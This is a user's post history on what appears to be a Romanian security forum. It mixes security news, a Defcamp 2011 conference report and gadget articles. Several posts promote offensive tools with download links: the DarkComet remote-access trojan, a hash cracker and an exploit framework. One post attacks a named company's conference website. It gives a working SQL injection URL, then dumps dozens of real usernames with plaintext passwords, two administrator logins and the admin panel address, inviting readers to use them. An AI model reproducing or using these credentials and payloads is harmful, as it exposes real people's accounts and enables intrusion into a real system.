Jump to content

Nytro

Administrators
  • Posts

    18725
  • Joined

  • Last visited

  • Days Won

    706

Everything posted by Nytro

  1. REMnux: A Linux Distribution for Reverse-Engineering Malware REMnux is a lightweight Linux distribution for assisting malware analysts in reverse-engineering malicious software. The distribution is based on Ubuntu and is maintained by Lenny Zeltser. REMnux is designed for running services that are useful to emulate within an isolated laboratory environment when performing behavioral malware analysis. As part of this process, the analyst typically infects another laboratory system with the malware sample and directs potentially-malicious connections to the REMnux system that's listening on the appropriate ports. REMnux is also useful for analyzing web-based malware, such as malicious JavaScript, Java programs, and Flash files. It also has tools for analyzing malicious documents, such as Microsoft Office and Adobe PDF? files, and utilities for reversing malware through memory forensics. In these cases, malware may be loaded onto REMnux and analyzed directly on the REMnux system without requiring other systems to be present in the lab. Download VMware virtual appliance archive: http://sourceforge.net/projects/remnux/files/version2/remnux-vm-public-2.0.zip/download Download: ISO image of a Live CD http://sourceforge.net/projects/remnux/files/version2/remnux-public-2.0-live-cd.iso/download Sursa: REMnux: A Linux Distribution for Reverse-Engineering Malware ~ THN : The Hacker News
  2. DarkComet-RAT v4.2 fwb (Firewall bypass) This version is firewall bypass it will inject to web browsers and bypass firewall rules. Targets are in this order : Firefox, Opera, Chrome, Safari, Internet Explorer and Explorer if all fails (normally never) then it runs normally. Notice now you can use remote computers as SOCKS5 proxies Changelog: - Now server module doesn't melt each times - SOCKS5 Server added – Multithread. - Camera streaming is now more stable - Camera capture interval added - Camera disable streatch enabled/disabled added - File Manager doesn’t crash on transfer anymore - Sound capture more stable and a bit faster - New process manager GUI and more user friendly - Process Dump added to the new process manager - Screen capture totally recoded, faster in Vista and Seven than before - Screen capture control more stable - No more black screen in screen capture on resize (avoid using 16bit colors in some systems) Most performant is 8Bit. - New password recovery using nirsoft tools (plugins like) Download: http://www.darkcomet-rat.com/ Sursa: http://thehackernews.com/2011/10/darkcomet-rat-v42-fwb-firewall-bypass.html
  3. Hash Code Cracker V 1.2 Released ~ Password Cracking from BreakTheSecurity BreakTheSecurity is proud to release the Hash Code Cracker Version 1.2. Our latest release supports Online Cracking function. Description: This password cracker is developed for PenTesters and Ethical hackers. Please Use this software for legal purposes(Testing the Password Strength). Features: This software will crack the MD5, SHA1,NTLM(Windows Password) hash codes. No need to install. Supports All platforms(windows XP/7,Linux,..). V1.2 Changelog : Included Online cracking Support Minimum Requirements: Java Runtime Environment: JRE 1.6 should be installed.(you can get it from oracle.com) How to Run the Application? Download the .zip file and extract. Extract the zip file. Open the Terminal or command prompt. Navigate to the path of Extracted zip file (i mean HashCodeCracker Folder) in Terminal/CMD. Type this command "java -jar HashCodeCracker.jar". Now the application will run. Project HomePage: http://projects.breakthesecurity.com/ Download: http://sourceforge.net/projects/crackerpassword/files/Version%201.2/HashCodeCracker.zip/download http://code.google.com/p/password-cracker/downloads/list Sursa: Hash Code Cracker V 1.2 Released ~ Password Cracking from BreakTheSecurity ~ THN : The Hacker News
  4. Derbycon 2011 Videos Talks The idea behind DerbyCon was developed by Dave Kennedy (ReL1K), Martin Bos (PureHate), and Adrian Crenshaw (Irongeek). Their motivation stemmed from a desire to see more of the old-style talks and events of the conventions of the past. DerbyCon was hosted by some specialized two-day training courses from 30th Sep-2nd Oct 2011 in Louisville, Kentucky. DerbyCon isn't just another security conference. They have taken the best elements from all of the conferences. DerbyCon is a place you can call home, where you can meet each other, party, and learn. Their goal is to create a fun environment where the security community can come together to share ideas and concepts. Whether you know Linux, how to program, are established in security, or a hobbyist, the ideal of DerbyCon is to promote learning and strengthen the community. Day 1 - Adrian, Dave, Martin: Welcome to DerbyCon 2011 - Intro to the con and events - KEYNOTE ~ HD MOORE – Acoustic Intrusions - Johnny Long - Hackers for Charity Update - Kevin Mitnick + Dave Kennedy - Adaptive Penetration Testing - The Penetration Testing Execution Standard (PTES) Panel - Bruce Potter - The Details Don’t Matter - Chris Nickerson – Compliance: An Assault on Reason - Pat McCoy & Chris Silvers - Hook, Line and Syncer: The Liar for Hire’s Ultimate Tacklebox - Jason Scott - Jason Scott’s Shareware Calvacade - atlas - sploit me if you can Day 2 - Dennis Kuntz - Mining Sensitive Information From Images Using Command-Line OCR - Michael Arpaia - Beat to 1337: Creating A Successful University Cyber Defense Organization - Carlos Perez (darkoperator) - Tactical Post Exploitation - Paul Asadoorian + John Strand: Offensive Countermeasures: Still trying to bring sexy back - Tony Huffman (Myne-us) - When Fuzzers Miss: The no Hanging Fruit. - Rafal Los - You’re Going to Need a Bigger Shovel – A Critical Look at Software Security Assurance - Rick Hayes + Karthik Rangarajan - OSINT Beyond the Basics - int0x80 (of Dual Core) - Anti-Forensics for the Louise - Rick Redman - Tomorrow you can patch that 0day – but your users will still get you p0wn3d - Tottenkoph - Data Mining for (Neuro) hackers Sursa: http://thehackernews.com/2011/10/derbycon-2011-videos-day-1-talks.html
  5. E posibil sa ma duc eu, sa vad daca se poate...
  6. Nytro

    Defcamp 2011

    Au trecut cateva zile de la Defcamp 2011, dar nu am uitat ce s-a intamplat si vreau sa aduc la cunostinta acest eveniment. Informatile oficiale le puteti citi aici: http://defcamp.ro/ Eu voi discuta acest eveniment din propria perspectiva. Pentru inceput, acest eveniment e o idee mai veche, a mai multor persoane. Am discutat si chiar daca nu speram ca va deveni realitate, se pare ca s-a pus in practica acest proiect. Defcamp e un o conferinta (puteti alege si alti termeni) nationala, unde ne-am intalnit o serie de persoane pasionate de hacking si de securitatea IT si am abordat diverse teme privind pasiunile noastre, pe langa ceea ce noi am numit "socializare" si o sa vedeti mai jos ce a insemnat. Cine suntem noi? Suntem hackeri? Nu, nu suntem hackeri si multi dintre noi nici nu isi doresc acest lucru. Desigur, noi avem conceptii diferite despre termenul de hacking, conceptii pe care majoritatea dintre voi le aveti induse de mass-media, atat de televiziune si definirea hackerului ca persoana care obtine acces neautorizat la anumite sisteme, cat si de filmele de doi lei, in care hackerii sunt diverse persoane care efectueaza cine stie ce actiuni complicata, apasand in disperare pe o sarmana tastatura si trecand de zeci de firewall-uri ca de ziduri de carton. De asemenea nu suntem nici experti in securitate, nu acoperim domenii intregi ci invatam ceea ce ne place si ne intereseaza in legatura cu aceste domenii, de obicei problemele de securitate care pot sa apara. Multi dintre noi nici nu suntem programatori, dar poate stim programare mai bine ca multi pseudo-programatori care castiga o gramada de bani, pentru niste bucati de cod scrise cu picioarele. Stim programare, nu stim totul, dar stim unde pot sa apara probleme de securitate, cum le putem descoperi, cum le putem exploata dar si cum le putem repara. Aceste detalii ne deosebesc pe noi de alte persoane si anume: 1) Programatorii sunt persoane care scriu cod pentru bani. Poate fac asta din placere, dar o fac din placere numai la inceput, apoi dispare tot farmecul.De asemenea, nu scriu ce cod vor, in ce limbaj vor, cum vor, ci asculta de niste sefi, multi dintre ei probabil mult mai slab pregatiti. Chiar si pentru bani, nu prea se pune accentul pe securitate, cea mai mare parte a programatorilor scriu cod cum au invatat si nu se gandesc la faptul ca un utilizator “rau” poate folosi un sir de caractere in locul unei valori numerice pentru un anumit parametru, astfel lipsind o validare, pot sa apara probleme grave de securitate. Si acesta este doar un exemplu. 2) Corporatistii (din industria IT) sunt din nou niste persoane care isi lauda legatura cu securitatea, doar pentru ca au niste notiuni teoretice si au auzit si ei de anumite tipuri de atacuri. De cele mai multe ori sunt persoane in varsta, care considera ca in experienta lor de ani de zile au intalnit si stiu sa contracareze totul. Nici pe departe adevarat. Ei nu stiu ce inseamna sa exploatezi un SQL Injection si ce metode de “bypass” exista, ei nu stiu cum functioneaza un buffer overflow, heap overflow, local root privilege escalation exploit si multe altele, iar faptul au auzit de acesti termeni nu ii face experti in aceste domenii. 3) Hackeri de carton. Daca va treziti cu diversi pusti de 15 ani ca ofera contra-cost cine stie ce servicii cum ar fi spargerea unei parole de messenger sau spargerea unui site… bingo, ei intra in aceasta categorie. Sunt persoane foarte tinere, de obicei sub 18 ani cu o mentalitate si o moralitate foarte putin dezvoltate, nu stiu ce inseamna etica hackingului si ce inseamna sa muncesti pentru un lucru. Sunt cei mai noi in acest domeniu si gasesc o multitudine de lucruri interesante, dar se rezuma la cele mai distrugatoare, la cele care le-ar putea hrani orgoliul, orice cu care ar putea sa se laude prietenilor. Dintre ele, spargerea unui site sau furtul (si nu “spargerea”) unei parole reprezinta lucruri marete. Desigur, nu fac nimic complicat, tot ce fac e sa foloseasca niste programe scrise de oameni ca noi, care nu cer bani pentru astfel de programe, si care le fac din placere, si cu 2-3 click-uri obtin diverse informatii. Desigur, cei mai multi dintre ei se lauda cu nimic. 4) Expertii in securitate sunt persoanele care lucreaza in domeniu securitatii IT. Sunt persoane care lucreaza la firme specializate pe acest domeniu si care stapanesc o multitudine de informatii care le ofera si satisfactii financiare pe masura. Cunostintele lor nu se rezuma la un singur domeniu, multi dintre ei cunosc mai multe lumbaje de programare si de scripting, precum si arhitectura mai multor sisteme de operare. Problema e ca probabil nu mai fac nimic din placere, ci o fac pentru bani. Asta ii impiedica sa descopera lucruri noi si devin niste roboti ai industriei. Ei sunt practic de vina pentru industrializarea hackingului, pentru faptul ca se vand pentru bani. 5) Hackerii sunt niste persoane din ce in ce mai rar intalnite in ziua de azi. Aici sunt sigur ca am o perspectiva diferita chiar si fata de marea majoritate a oamenilor din industria securitatii IT. In trecut, existau diverse grupuri de persoane pentru care programarea, securitatea si descoperirea si exploatarea vulnerabilitatilor erau o arta. E vorba de persoanele care au descoperit primele Buffer Overflow-uri, primele SQL Injection-uri (folosesc acesti termeni pentru ca sunt consacrati in aceste domenii), oameni cu o imaginatie bogata, cunostinte vaste “vandute” gratis altor persoane care vor sa invete lucruri noi. Da, pana la urma totul se rezuma la bani. Hackerii adevarati sunt acele persoane care ofera informatia gratuit celor care o doresc, dar lucrurile tind sa se schimbe in ziua de azi cand se pare ca majoritatea persoanelor cu adevarat bune in diverse domenii fac orice pentru bani. Aici apare si maturitatea. Practic varsta frageda ii impiedica sa se vanda pentru niste sume de bani. La ei totul vine din placere si cel mai adesea din curiozitate: “Dar daca folosesc un sir de caractere mai mare decat marimea buffer-ului, ce o sa se intample?”. O discutie despre acest domeniu ar putea fi scrisa intr-o carte, eu doar am vrut sa ilustrez cateva idei, sa va faceti o idee despre modul in care gandesc eu si despre modul in care gandim noi, probabil cea mai mare parte (sper) a participantilor la Defcamp 2011. Defcamp a strand la Bran, weekend-ul 30 septembrie – 1 octombrie in jur de 40-50 de oameni. Ideea principala era sa ne impartasim idei si sa abordam teme cat mai tehnice pe care sa le putem dezbate, sa putem crea ceva mai bun si sa punem pe picioare diverse colaborari de viitor sau sa ne deschidem noi perspective. Din punct de vedere organizatoric cred ca totul a fost perfect. Pentru asta vreau sa le multumesc sponsorilor: Club Vila Bran, Bitdefender si Ucoz Romania. Am avut parte de cazare gratuita (50 de persoane), o sala de conferinte si RedBull si Pepsi cu sacii (si la propriu si la figurat). Poate singura problema ar fi fost preturile cam mari la restaurantul la care am mancat, dar mancarea facea toti banii. Desigur, am avut noi grija ca bautura sa nu lipseasca si ne-am provizionat intr-o seara astfel incat sa avem indeajuns… Nu vreau sa dau detalii despre ce, cum si cat am baut, veniti la editia viitoare si vedeti cum o sa fie. In legatura cu prezentarile ar putea fi multe de spus, s-au discutat foarte multe lucruri tehnice, de la criptografie la tehnici avansate de SQL Injection. Prezentarile le puteti vedea aici: http://defcamp.ro/blog/defcamp-2011-un-final-al-unui-inceput/ . Eu am discutat despre PE File Format (structura fisierelor executabile: .exe .dll), DLL Injection (metode de injectare a unui DLL intr-un alt proces, pentru a executa propriul cod in cadrul unui alt proces) si API Hooking (monitorizarea si interceptarea apelurilor functiilor de sistem), dar si putin despre incarcarea manuala a unui executabil in memorie. Bine, facusem si un proiect si urma sa il prezint, dar proiectul a fost facut cu o noapte inainte, deci nu am avut timp sa fac ceea ce imi doream si nu am avut nici destul timp sa prezint, m-am lungit si nici nu am acoperit tot ce voiam sa acopar. A, da, prezentarea mea e realizata din cateva imagini gasite prin calculator pentru ca am facut-o cu o ora inainte de a prezenta, putin ametit si fara acces la internet si prea multe materiale. Dintre celelalte prezentari cel mai mult mi-au placut tehnicile de “MySQL Injections” ale lui denjacker, un prieten cu care mai discutam diverse lucruri despre acest domeniu la o bere. De acolo pe langa faptul ca am invatat cateva lucruri care ma gandeam ca sunt imposibile, am mai si gandit cateva lucruri noi pe care sper sa le pot incerca in curand cu el, in limita timpului disponibil. A se lua in considerare tehnica de DOS folosind BENCHMARK, pe cat de ingenioasa, pe atat e de usor de pus in practica, si se pare ca din cateva request-uri, se poate “chinui” un procesor, se poate forta sa lucreze la 100%. Pe langa lucrurile tehnice, a fost si ceva ce noi am numit “socializare”, dar care a fost mult mai mult decat atat. Ne-am strans cea mai mare parte dintre noi intr-un apartament mare, oameni care ne stiam din mediul online si care am descoperit ca suntem mult mai “ok” in viata reala. Am baut, multi au jucat pocker (mie nu imi place), am jucat Counter-Strike si multe altele. Imi e dor de discutiile tehnice dupa multa vodka, parca au alt farmec daca sunt purtate astfel. Nu prea s-a dormit, majoritatea am stat pana cel putin 04:00, dar a trebuit sa dormim pentru ca programul “tehnic” incepea de dimineata. Bine, nu prea am ajuns noi la timp, a durat ceva sa ne “trezim”, dar totul s-a desfasura foarte bine si nu au fost probleme. De asemenea, una dintre cele mai importante activitati a fost Defcamp Forensic Contest. A fost un concurs bazat pe o serie de probe, practic trebuia sa facem rost de parolele unor arhive prin diverse metode. De exemplu, la prima arhiva a fost un script in limbajul “brainfuck” (vezi Wikipedia), la un altul erau doua imagini si trebuia facuta o operatie cu matricile de RGB ale acelor matrice… Proba care ne-a cam chinuit a fost a III-a, era un joc de sah, JavaScript, la care se stiau anumite pozitii, si trebuia scris un program care sa verifice toate posibilitatile intr-un mod optim pentru a rezolva problema. Multumiri (acolo l-am injurat putin) lui Hertz, baietul care a conceput aceste probe. In final, am invatat lucruri noi, am legat prietenii, ne-am distrat, ne-am simtit bine. Sper sa ne revedem si la Defcamp 2012!
  7. Detalii: http://poyovl.wordpress.com/2011/10/06/defcamp-2011/
  8. Se pare ca au reparat. Eh, asta e, ce-a fost a fost.
  9. Suna stupid numele lor.
  10. Da, nu stiu ce fac ei acolo, dar mie mi se pare ca nu fac nimic. Nu am ce face. Vrea cineva sa participe? Sa isi faca cont si sa imi spuna datele sa il confirm.
  11. Au "reparat", dar parolele sunt aceleasi, probabil si SQLI-ul mai este. Am pus doar text. PS: Ia vedeti acum Conferintele FinMedia, Evenimentele FinMedia, Publicatiile FinMedia Edit: Cred ca au oprit serverul
  12. Mie tot imi merge redirectul, apare si mesajul...
  13. Arsi: Conferintele FinMedia, Evenimentele FinMedia, Publicatiile FinMedia
  14. Forumul securitatii IT, pe 11 octombrie de Laurentiu Popa | 4 octombrie 2011 Finmedia, in parteneriat cu KPMG Romania, organizeaza a patra editie a Romanian IT&C Security Forum, eveniment important pentru piata produselor si serviciilor de securitate IT. In contextul noilor forme de hacking, cand sunt dezvoltate forme avansate de atacuri, care sa reziste mai bine in timp si de pe urma carora se urmareste sa se obtina controlul infrastructurilor IT, cand dispozitivele mobile castiga teren vazand cu ochii, cand securitatea este si mai amenintata de comportamentul angajatilor ce poate duce la erori umane, ce faciliteaz? pierderea de date si vulnerabilizeaza infrastructura, riscurile de compromitere a afacerii cresc exponential. Pe o piata de produse si servicii de securitate IT care ruleaza oficial sub 15 milioane de euro pe an, exista nevoia de a se face evaluari periodice, a se gasi un prilej de a privi atent la noutati, strategii si abordari, a desprinde perspective si initiative in acest domeniu de nisa. Evenimentul se va tine pe 11 octombrie 2011, incepand cu ora 9, la Hotel Crowne Plaza din Bucuresti, sala Magnolia. Cine participa: - reprezentanti ai organismelor oficiale si ai asociatiilor profesionale - middle managementul din companii mijlocii si mari care au responsabilita?i directe in business - IT manageri, ingineri de sistem - consultanti independenti de specialitate - auditori si persoane certificate - furnizori de sisteme si solutii de securitate IT - CIO si CISO din banci comerciale Va sfatuim sa participati, pentru a va informa in legatura cu dinamica pietei globale de securitate la nivel european, prin comparatii cu evolutiile din Romania, norme, reglementari si noutati pe linie institutionala. De asemenea, vor fi prezentate noile tendinte, abordari si mijloace de protectie a companiei contra cybercrimei. Per total, se prezinta o imagine de ansamblu asupra ofertei de moment de pe piata de produse si servicii specializate pe securitate IT. Sursa: Forumul securitatii IT, pe 11 octombrie | Hit.ro Se vede din programul lor ce rahat o sa fie, industrializarea hacking-ului... De cand "restrictionarea accesului angajatilor la Internet" e o problema de securitate? TAXA DE PARTICIPARE: 496 lei /pers, TVA inclus. Sa-i fut in gura, muritori de foame, de-ar avea parte de ei in mormant. Program (cu SQL Injection) http://www.finmedia.ro/conferences/conferinta.php?cod=rom_itc_sec_for&editie=4&comanda=program De XSS in cautare nici nu se pune problema. Cand am timp ma uit in detaliu. Si tot nu inteleg, de ce "Forumul securitatii IT"? In fine, am ceva idei Edit: Tabele: conferinte contacte log speakeri speakeri_conf sponsori sponsori_conf utilizatori utilizatori_conf articole cuprins_reviste descriere_sectiuni newsletter Utilizatori si parole (tabelul "utilizatori"): galatop100:galatop100 ,alina_berlea:gianny ,Catalin Spataru:sdc66sdc66 ,georgs:elenageorge ,eiovu:silverbird357 ,vizitator: ,danielnvasile:tumpilica ,roxanatoader:19962407 ,Daniel:daniel ,sache:sachita ,paltineanu:secret ,valentinbogdan:supersucces ,macovei:fin.media2004 ,lupiduph:piroman ,bolteanu:123456 ,ddbroa:123456 ,sviorel:vserbu ,sbejan:garidas ,diana:itdromania ,sorinaun:heralzii ,Alex:h2oh2o ,Alecks:h2oh2o ,ramona:roxana ,Flory:mazepa ,: ,Ecaterina:caterinar ,gabiarsene:razvan ,iona:guguloi ,madalina:madalina ,gerald.dinca:star86 ,FLORENTINS:CCPCFRDC ,cgalea:crimong ,PopM:autovit ,da-tech:datechinfo ,georgiana:15201929 ,MARCEL:MARCEL ,Burky:MpRomania ,dorian:doru ,accalugaru:corina ,VILIE:eili ,catalina:piticque ,iulianbudusan:1t5m9r4h ,dinescu:sandi ,simonada:margareta ,caliman:emil ,erykal:pasttense ,munteanu:munteanu ,mdanilov:pezevenghi ,PRIMARIE:DTS ,Adrian:adrian ,PetronelaD:alfach ,vicbogdan2004:david18 ,doina:draganescu ,LAURENTIU:l Sintaxa: www.finmedia.ro/conferences/conferinta.php?comanda=program&editie=4&cod=null' union select 1,2,3,4,5,6,7,group_concat(username, 0x3a, password, 0xD, 0xA),9,10,11,12,13,14,15,16 from utilizatori-- --+-- Thanks tdxev. Conturi de admin: Username: eiovu Password: silverbird357 Username: conferinte Password: 1master2 Administrare: http://www.finmedia.ro/conferences/admin.php Faceti ce doriti cu datele. PS: Problema rezolvata: http://www.finmedia.ro/conferences/
  15. Da, singurul lucru util la scoala e ca iti faci prieteni. In rest, nu te ajuta cu nimic.
  16. Exploit Pack - An open source security framework Exploit Pack is an open source security framework developed by Juan Sacco. It combines the benefits of a Java GUI, Python as Engine and well-known exploits on the wild. It has an IDE to make the task of developing new exploits easier, instant search features and XML-based modules. A GPL license for the entire project helps to ensure the code will remain free. It also features a ranking system for contributors, tutorials for everyone who wants to learn how to create new exploits and a community to call for help. Why use Exploit Pack? It has a module editor that allows you to create your own custom exploits. There is an instant search feature built-in on the GUI for easier access to modules. Modules use XML DOM, so they are really easy to modify. It uses Python as its Engine because the language is more widely used on security related programming. A tutorial is also provided. If you want to earn money, they will pay you for each module you add to Exploit Pack. Download: http://exploitpack.com/download-framework Sursa si video: Exploit Pack - An open source security framework ~ THN : The Hacker News
  17. VIDEO: primul telefon cu ecran flexibil - Samsung Galaxy Skin de Radu Eftimie | 4 octombrie 2011 Samsung Galaxy Skin reprezinta ultima frontiera in lumea telecom si o noua incercare a sud-coreenilor de a detrona Apple: device-ul va avea un display AMOLED care ii va permite sa se plieze in jurul unui cilindru cu grosimea de 1 inci. Display-ul foloseste un strat de poliamida in loc de sticla. Dar, materialul cel mai important care a facut posibila realizarea acestui telefon, chiar si ca prototip, este grafenul, care este cunoscut drept materialul "minune". Grafenul este cel mai rezistent material din lume (de 200 de ori mai rezistent decat otelul), potrivit cercetatorilor de la universitatea Columbia. Ca specificatii tehnice, Galaxy Skin va avea: - rezolutie de 800x480 pixeli - camera de 8 megapixeli - 1 GB de memorie RAM - procesor de 1,2 GHz Deocamdata este un concept. Lansarea unui astfel de telefon ar putea avea loc in a doua jumatate anului viitor. Iata un videoclip sugestiv cu noua "minune" cu care Samsung se pregateste sa cucereasca lumea in 2012: Sursa si video: VIDEO: primul telefon cu ecran flexibil - Samsung Galaxy Skin | Hit.ro
  18. Nytro

    Ajutor bot php

    Cu cURL trimiti datele de logare din formlar. La citirea datelor, va trebui sa salvezi headerele, e optiune pentru asta COOKIE_JAR cred, ca la urmatorul request sa fii logat. Apoi faci direct request catre startpage.php.
  19. Nytro

    Certificari

    Certificarile "care se respecta" nu se dau asa, aiurea, de acasa... Se asigura pe cat posibil ca nu ai informatiile din teste la indemana. Pana la urma, daca e asa, poti lua un examen chiar daca nu stii nimic, cat timp ai informatiile la indemana. Din cate stiu esti (d)in Germania. Acolo gasesti probabil multe sedii unde poti da multe certificari.
  20. VIDEO: Maine se lanseaza iPhone 5. Cum ar trebui sa arate? de Radu Eftimie | 3 octombrie 2011 Pentru ca iPhone 5 va fi cu siguranta lansat pe piata maine, ne-am gandit sa adunam cele mai vehiculate informatii care au aparut pana acum despre viitorul smartphone de la Apple si sa vi le prezentam. Ce asteapta fanii de la urmatoarea generatie de telefoane Apple? Procesor dual-core identic celui folosit pe tableta iPad 2, dar si memorie suficienta pentru orice... 1 GB RAM, ecranul ar trebui sa fie mai mare (de 3,7 sau 4 inci) dar cu aceeasi tehnologie - retina display. In plus, tot pasionatii Apple ar vrea ca telefonul sa nu fie mai gros de 8 mm si sa fie dotat cu o camera foto de 8 MP. Multi incercat sa propuna un design concret pentru iPhone 5 pe baza zvonurilor privind dotarile hardware ale telefonului. Mai jos puteti urmari cateva clipuri create pe baza informatiilor "scurse" pe net. Pe 4 octombrie, la ora 8 seara - ora Romaniei - vom afla care dintre aceste previziuni au fost adevarate. Sursa si videoclipuri: http://www.hit.ro/telefoane-mobile/Maine-se-lanseaza-iphone-5-Cum-ar-trebui-sa-arate
  21. S-a folosit de informatii publice, deci ar avea tot dreptul. Da, probabil exista persoane mai "smechere", dar nu s-au ocupat.
  22. Linux - Means Freedom [The Hacker News Magazine] Dear Readers, We here at The Hacker News were very humbled to be given the opportunity to celebrate 10 millions hits to the website. Wow! We are so very grateful for your support and as I told you last month, I don't think Hacking is going anywhere and neither are we!! Your feedback is very important to us. Feel free to send us your thoughts and desires for Hacking news. If you want to write an editorial, let us know. We'd love to include it next month. For now, we will see you in our daily and best wishes for a great month. Content of October Edition: Linux - Means Freedom How to make my Linux Secure ? Hackathon Insider Threads Vs Hackers Linux : How to Series by Alok Srivastav Window 8 - Touch the Future The Security Model of Window 8 Server Microsoft Security Development Cycle September Cyber Attacks Download: http://theevilhackerz.com/THN-oct2011.pdf http://theevilhackerz.com/THN-oct2011.rar Sursa: Linux - Means Freedom [The Hacker News Magazine] October 2011 Issue Released ~ THN : The Hacker News
  23. Kaspersky Lab, Kyrus Tech si Microsoft au inchis botnet-ul Hlux/Kelihos By Radu FaraVirusi(com) on October 3, 2011 Kaspersky Lab, Microsoft si compania IT Kyrus Tech au colaborat la desfasurarea operatiunilor de inchidere a retelei de computere-zombie Kelihos, initial numita Hlux de catre Kaspersky Lab. Botnet-ul, compus din aproximativ 40.000 de computere infectate, era folosit de catre infractorii cibernetici pentru a trimite miliarde de mesaje spam, a fura informatii personale, a lansa atacuri DDoS, precum si pentru alte activitati ilegale. Microsoft a initiat un proces impotriva a 24 de persoane aflate in spatele acestui botnet, actiune care a dus la inchiderea domeniilor de Internet folosite de serverele de comanda si control ale retelei. Initiativa Microsoft a fost sustinuta prin contributii din partea Kaspersky Lab si o declaratie directa din partea Kyrus Tech, care oferea informatii detaliate si dovezi despre Kelihos. Kaspersky Lab a jucat un rol important in dezactivarea botnet-ului, colaborand cu Microsoft inca de la inceputul anului 2011 si oferind informatii in timp real despre activitatea Kelihos. La momentul actual, Kaspersky Lab se asigura ca reteaua nu mai poate fi controlata de nimeni – specialistii companiei au modificat codul folosit in administrarea acesteia, au spart protocolul de comunicare, au descoperit vulnerabilitatile infrastructurii peer-to-peer si au dezvoltat instrumentele specifice pentru a o contracara. In momentul in care actiunea legala a Microsoft a condus la dezactivarea domeniilor de Internet folosite de atacatori, Kaspersky Lab a patruns in retea si a preluat-o sub administrarea sa. „Kaspersky Lab a avut un rol-cheie in aceasta operatiune, oferindu-ne informatii importante si detaliate, culese pe baza analizei tehnice si a intelegerii modului in care opereaza Kelihos”, spune Richard Boscovich, avocat in cadrul Microsoft Digital Crimes Unit. „Aceste informatii au contribuit la inchiderea cu succes a botnet-ului, dar au servit si ca probe in instanta. Le multumim pentru sustinere si pentru dorinta lor de a lupta pentru un Internet mai sigur”, completeaza acesta. „Din 26 septembrie, cand Kaspersky Lab a initiat operatiunea de infiltrare in botnet, acesta a fost inoperabil”, afirma Tillmann Werner, Senior Malware Analyst Kaspersky Lab Germania. „Calculatoarele-zombie comunica acum cu noi, de aceea putem initia, de exemplu, activitati pentru a descoperi numarul de infectii pentru fiecare tara. Pana acum, Kaspersky Lab a numarat 61.463 de adrese IP infectate si colaboreaza cu toti furnizorii de servicii Internet (ISP) implicati, pentru a avertiza administratorii retelelor cu privire la acestea”, incheie Werner. Kelihos este un botnet de tip peer-to-peer si este compus din mai multe straturi – „controllers”, „routers” si „workers”. „Controllers” sunt computerele presupuse a fi controlate de catre infractorii cibernetici. Acestea distribuie comenzi tuturor celorlalte unitati si supravegheaza structura dinamica a retelei peer-to-peer. „Routers” sunt masini infectate, care au adrese IP publice, si sunt utilizate pentru a trimite spam, a colecta adrese de e-mail, a fura date de autentificare din fluxul retelei si multe altele. Microsoft a anuntat ca a adaugat semnatura de detectie pentru malware-ul Kelihos in Malicious Software Removal Tool, distribuit prin serviciul de update automat, care a dus la dezinfectarea unui numar mare de computere. Kaspersky Lab colaboreaza in mod constant cu Microsoft, un exemplu recent in acest sens fiind operatiunea de identificare si eliminare a viermelui Stuxnet, folosit de hackeri pentru a controla infrastructura IT industriala a centralelor nucleare din Iran. Kaspersky Lab a initiat si un sondaj, prin intermediul caruia intreaba utilizatorii cum trebuie sa procedeze cu botnet-ul Kelihos, din moment ce are control asupra sa. Pentru a raspunde, accesati http://www.securelist.com/en/polls. Kaspersky Lab multumeste SURFnet pentru sustinere in derularea operatiunii de infiltrare in botnet-ul Kelihos. Sursa: http://www.faravirusi.com/2011/10/03/kaspersky-lab-kyrus-tech-si-microsoft-au-inchis-botnet-ul-hluxkelihos/
  24. Nytro

    Certificari

    Nu ai nevoie de cursuri, o carte cam e de ajuns, de obicei e specificata la informatiile despre examen. Si exista carti speciale pentru examenele de ceritificare, programe cu intrebari si multe altele...
  25. Nytro

    Certificari

    Eu am luat MCTS Windows Internals, costa cam 50 - 80 de dolari, nu mai stiu, eu l-am dat gratis cu voucher de la facultate (MSP - Microsoft Student Partners). Am invatat singur, cateva ore... Apoi am mers la un centru unde se pot da, sunt vreo 8 centre in Bucuresti. Ai deschisa doar o aplicatie si nu ai voie cu telefon, nimic. Pe web nu stiu decat de Cisco, dar nu am dat si nu cred ca poti da de acasa.
×
×
  • Create New...